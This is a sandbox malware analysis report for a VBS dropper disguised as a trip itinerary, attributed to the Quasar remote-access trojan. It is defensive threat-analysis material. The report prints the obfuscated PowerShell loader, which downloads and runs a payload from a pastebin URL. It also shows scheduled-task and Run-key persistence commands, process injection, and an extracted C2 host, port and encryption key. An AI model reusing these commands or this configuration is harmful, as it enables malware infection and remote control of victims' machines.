quasar | b73dbf4a79bb87a8294bf87271ec249ed831ec72e6e194c3636f78858dcd3ab1

Analysis

max time kernel
136s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
14-06-2023 13:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Trip Itinerary detail.vbs
Size

245KB
MD5

e011adb4a7b7e60d89697fd6060a5b83
SHA1

6a7c2953cffe72cb5178d800be718bbadcf7f14b
SHA256

b73dbf4a79bb87a8294bf87271ec249ed831ec72e6e194c3636f78858dcd3ab1
SHA512

c6adbaf622441058d018258adbb2d1cda5b390c80234ea66b1fe9fd149b5adf28f7a8575d6159d25073fde93f712a86831968cf0a0ed710c495581042c275d00
SSDEEP

3072:iC99Sy99y999999999996999999999999N9999SoV969ZA:Z

Score

10^/10

quasar venom client persistence spyware trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/PUgmUTiH

Extracted

Family

quasar

Version

2.7.0.0

Botnet

Venom Client

crazydns.linkpc.net:26134

Mutex

JlYM51eW4iZoFyLa2X

Attributes

encryption_key
dRPxHr2NcM6jte8WN3KY
install_name
Venom.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Venom Client Startup

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/3304-221-0x0000000000400000-0x0000000000510000-memory.dmp	family_quasar

Blocklisted process makes network request 12 IoCs

flow	pid	Process
11	2744	powershell.exe
13	2744	powershell.exe
22	2744	powershell.exe
38	4448	powershell.exe
39	4448	powershell.exe
41	4448	powershell.exe
66	4696	powershell.exe
67	4696	powershell.exe
68	4696	powershell.exe
72	3284	powershell.exe
73	3284	powershell.exe
74	3284	powershell.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	wscript.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OaMYC.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OaMYC.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OaMYC.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OaMYC.lnk	powershell.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OaMYC = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OaMYC = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OaMYC = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OaMYC = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
33	ip-api.com

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2744 set thread context of 3304	2744	powershell.exe	95
PID 4448 set thread context of 232	4448	powershell.exe	115
PID 4696 set thread context of 1844	4696	powershell.exe	133
PID 3284 set thread context of 4024	3284	powershell.exe	149

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3756	schtasks.exe
2364	schtasks.exe
408	schtasks.exe
2412	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3700	powershell.exe
3700	powershell.exe
2744	powershell.exe
2744	powershell.exe
2744	powershell.exe
4736	powershell.exe
1804	powershell.exe
4452	powershell.exe
4884	powershell.exe
1804	powershell.exe
4452	powershell.exe
4884	powershell.exe
4736	powershell.exe
4736	powershell.exe
4856	powershell.exe
4856	powershell.exe
3308	powershell.exe
3308	powershell.exe
1380	powershell.exe
1380	powershell.exe
4448	powershell.exe
4448	powershell.exe
4448	powershell.exe
3132	powershell.exe
3132	powershell.exe
1648	powershell.exe
1648	powershell.exe
1460	powershell.exe
1460	powershell.exe
2724	powershell.exe
2724	powershell.exe
1460	powershell.exe
3132	powershell.exe
1648	powershell.exe
2724	powershell.exe
1648	powershell.exe
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe
4448	powershell.exe
4448	powershell.exe
3336	powershell.exe
3336	powershell.exe
1656	powershell.exe
1656	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
468	powershell.exe
1668	powershell.exe
468	powershell.exe
1668	powershell.exe
468	powershell.exe
4700	powershell.exe
4700	powershell.exe
4616	powershell.exe
4616	powershell.exe
3856	powershell.exe
3856	powershell.exe
4992	powershell.exe
4992	powershell.exe
4540	powershell.exe
4540	powershell.exe
3284	powershell.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	3304	aspnet_compiler.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	3336	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	4696	powershell.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeDebugPrivilege	1668	powershell.exe
Token: SeDebugPrivilege	4700	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	3284	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4908 wrote to memory of 3700	4908	WScript.exe	85
PID 4908 wrote to memory of 3700	4908	WScript.exe	85
PID 3700 wrote to memory of 2744	3700	powershell.exe	87
PID 3700 wrote to memory of 2744	3700	powershell.exe	87
PID 2744 wrote to memory of 4736	2744	powershell.exe	88
PID 2744 wrote to memory of 4736	2744	powershell.exe	88
PID 2744 wrote to memory of 1804	2744	powershell.exe	89
PID 2744 wrote to memory of 1804	2744	powershell.exe	89
PID 2744 wrote to memory of 4884	2744	powershell.exe	92
PID 2744 wrote to memory of 4884	2744	powershell.exe	92
PID 2744 wrote to memory of 456	2744	powershell.exe	91
PID 2744 wrote to memory of 456	2744	powershell.exe	91
PID 2744 wrote to memory of 4452	2744	powershell.exe	90
PID 2744 wrote to memory of 4452	2744	powershell.exe	90
PID 456 wrote to memory of 2364	456	cmd.exe	93
PID 456 wrote to memory of 2364	456	cmd.exe	93
PID 4736 wrote to memory of 4856	4736	powershell.exe	94
PID 4736 wrote to memory of 4856	4736	powershell.exe	94
PID 2744 wrote to memory of 3304	2744	powershell.exe	95
PID 2744 wrote to memory of 3304	2744	powershell.exe	95
PID 2744 wrote to memory of 3304	2744	powershell.exe	95
PID 2744 wrote to memory of 3304	2744	powershell.exe	95
PID 2744 wrote to memory of 3304	2744	powershell.exe	95
PID 2744 wrote to memory of 3304	2744	powershell.exe	95
PID 2744 wrote to memory of 3304	2744	powershell.exe	95
PID 2744 wrote to memory of 3304	2744	powershell.exe	95
PID 3504 wrote to memory of 3308	3504	wscript.exe	99
PID 3504 wrote to memory of 3308	3504	wscript.exe	99
PID 3308 wrote to memory of 4060	3308	powershell.exe	101
PID 3308 wrote to memory of 4060	3308	powershell.exe	101
PID 4060 wrote to memory of 1380	4060	wscript.exe	102
PID 4060 wrote to memory of 1380	4060	wscript.exe	102
PID 1380 wrote to memory of 4448	1380	powershell.exe	105
PID 1380 wrote to memory of 4448	1380	powershell.exe	105
PID 4448 wrote to memory of 1648	4448	powershell.exe	106
PID 4448 wrote to memory of 1648	4448	powershell.exe	106
PID 4448 wrote to memory of 1460	4448	powershell.exe	107
PID 4448 wrote to memory of 1460	4448	powershell.exe	107
PID 4448 wrote to memory of 3132	4448	powershell.exe	108
PID 4448 wrote to memory of 3132	4448	powershell.exe	108
PID 4448 wrote to memory of 3208	4448	powershell.exe	109
PID 4448 wrote to memory of 3208	4448	powershell.exe	109
PID 4448 wrote to memory of 2724	4448	powershell.exe	110
PID 4448 wrote to memory of 2724	4448	powershell.exe	110
PID 3208 wrote to memory of 408	3208	cmd.exe	111
PID 3208 wrote to memory of 408	3208	cmd.exe	111
PID 1648 wrote to memory of 3852	1648	powershell.exe	113
PID 1648 wrote to memory of 3852	1648	powershell.exe	113
PID 4448 wrote to memory of 4172	4448	powershell.exe	114
PID 4448 wrote to memory of 4172	4448	powershell.exe	114
PID 4448 wrote to memory of 4172	4448	powershell.exe	114
PID 4448 wrote to memory of 232	4448	powershell.exe	115
PID 4448 wrote to memory of 232	4448	powershell.exe	115
PID 4448 wrote to memory of 232	4448	powershell.exe	115
PID 4448 wrote to memory of 232	4448	powershell.exe	115
PID 4448 wrote to memory of 232	4448	powershell.exe	115
PID 4448 wrote to memory of 232	4448	powershell.exe	115
PID 4448 wrote to memory of 232	4448	powershell.exe	115
PID 4448 wrote to memory of 232	4448	powershell.exe	115
PID 5076 wrote to memory of 3336	5076	wscript.exe	120
PID 5076 wrote to memory of 3336	5076	wscript.exe	120
PID 3336 wrote to memory of 1568	3336	powershell.exe	122
PID 3336 wrote to memory of 1568	3336	powershell.exe	122
PID 1568 wrote to memory of 1656	1568	wscript.exe	123

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HY‱d‱B0‱H‱‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB6‱Hg‱YgBq‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱b‱Bq‱Hk‱ZwB2‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱F‱‱VQBn‱G0‱VQBU‱Gk‱S‱‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱b‱Bq‱Hk‱ZwB2‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBW‱Es‱UgBl‱EI‱UwBT‱GY‱bQ‱y‱Ew‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱egB4‱GI‱ag‱g‱Cw‱I‱‱n‱E8‱YQBN‱Fk‱Qw‱n‱Cw‱I‱‱k‱HI‱dgB0‱HQ‱c‱‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs');powershell -command $KByHL;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rvttp = '01234';$mzxbj = 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs';[Byte[]] $ljygv = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PUgmUTiH') ) );[system.AppDomain]::CurrentDomain.Load($ljygv).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('VKReBSSfm2Lx/daolnwod/moc.oietsap//:sptth' , $mzxbj , 'OaMYC', $rvttp, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4736
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4452
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:456
    - - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
        5⤵
        Creates scheduled task(s)
        
        PID:2364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4884
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3304

C:\Windows\system32\wscript.exe
wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3308
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" //b //nologo "C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J‱By‱HY‱d‱B0‱H‱‱I‱‱9‱C‱‱Jw‱w‱DE‱Mg‱z‱DQ‱Jw‱7‱CQ‱bQB6‱Hg‱YgBq‱C‱‱PQ‱g‱Cc‱JQBw‱Ho‱QQBj‱E8‱ZwBJ‱G4‱TQBy‱CU‱Jw‱7‱Fs‱QgB5‱HQ‱ZQBb‱F0‱XQ‱g‱CQ‱b‱Bq‱Hk‱ZwB2‱C‱‱PQ‱g‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBD‱G8‱bgB2‱GU‱cgB0‱F0‱Og‱6‱EY‱cgBv‱G0‱QgBh‱HM‱ZQ‱2‱DQ‱UwB0‱HI‱aQBu‱Gc‱K‱‱g‱Cg‱TgBl‱Hc‱LQBP‱GI‱agBl‱GM‱d‱‱g‱E4‱ZQB0‱C4‱VwBl‱GI‱QwBs‱Gk‱ZQBu‱HQ‱KQ‱u‱EQ‱bwB3‱G4‱b‱Bv‱GE‱Z‱BT‱HQ‱cgBp‱G4‱Zw‱o‱C‱‱K‱BO‱GU‱dw‱t‱E8‱YgBq‱GU‱YwB0‱C‱‱TgBl‱HQ‱LgBX‱GU‱YgBD‱Gw‱aQBl‱G4‱d‱‱p‱C4‱R‱Bv‱Hc‱bgBs‱G8‱YQBk‱FM‱d‱By‱Gk‱bgBn‱Cg‱JwBo‱HQ‱d‱Bw‱HM‱Og‱v‱C8‱c‱Bh‱HM‱d‱Bl‱GI‱aQBu‱C4‱YwBv‱G0‱LwBy‱GE‱dw‱v‱F‱‱VQBn‱G0‱VQBU‱Gk‱S‱‱n‱Ck‱I‱‱p‱C‱‱KQ‱7‱Fs‱cwB5‱HM‱d‱Bl‱G0‱LgBB‱H‱‱c‱BE‱G8‱bQBh‱Gk‱bgBd‱Do‱OgBD‱HU‱cgBy‱GU‱bgB0‱EQ‱bwBt‱GE‱aQBu‱C4‱T‱Bv‱GE‱Z‱‱o‱CQ‱b‱Bq‱Hk‱ZwB2‱Ck‱LgBH‱GU‱d‱BU‱Hk‱c‱Bl‱Cg‱JwBD‱GQ‱VwBE‱GQ‱Qg‱u‱EQ‱SwBl‱FM‱dgBs‱Cc‱KQ‱u‱Ec‱ZQB0‱E0‱ZQB0‱Gg‱bwBk‱Cg‱JwBO‱G4‱SQBh‱FU‱cQ‱n‱Ck‱LgBJ‱G4‱dgBv‱Gs‱ZQ‱o‱CQ‱bgB1‱Gw‱b‱‱s‱C‱‱WwBv‱GI‱agBl‱GM‱d‱Bb‱F0‱XQ‱g‱Cg‱JwBW‱Es‱UgBl‱EI‱UwBT‱GY‱bQ‱y‱Ew‱e‱‱v‱GQ‱YQBv‱Gw‱bgB3‱G8‱Z‱‱v‱G0‱bwBj‱C4‱bwBp‱GU‱d‱Bz‱GE‱c‱‱v‱C8‱OgBz‱H‱‱d‱B0‱Gg‱Jw‱g‱Cw‱I‱‱k‱G0‱egB4‱GI‱ag‱g‱Cw‱I‱‱n‱E8‱YQBN‱Fk‱Qw‱n‱Cw‱I‱‱k‱HI‱dgB0‱HQ‱c‱‱s‱C‱‱Jw‱x‱Cc‱L‱‱g‱Cc‱UgBv‱GQ‱YQ‱n‱C‱‱KQ‱p‱Ds‱';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('‱','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs');powershell -command $KByHL;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1380
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$rvttp = '01234';$mzxbj = 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs';[Byte[]] $ljygv = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PUgmUTiH') ) );[system.AppDomain]::CurrentDomain.Load($ljygv).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('VKReBSSfm2Lx/daolnwod/moc.oietsap//:sptth' , $mzxbj , 'OaMYC', $rvttp, '1', 'Roda' ));"
        5⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        7⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3852
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1460
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3132
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3208
        
        C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /tn "Roda" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\xx.vbs'" /sc minute /mo 1 /f
        7⤵
        Creates scheduled task(s)
        
        PID:408
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2724
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:4172
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        
        PID:232

C:\Windows\system32\wscript.exe
wscript.exe //b //nologo "C:\Users\Admin\AppData\Local\Temp\xx.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3336
- - C:\Windows\system32\wscript.exe
    "C:\Windows\system32\wscript.exe" //b //nologo "C:\Users\Admin\AppData\Local\Temp\Trip Itinerary detail.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
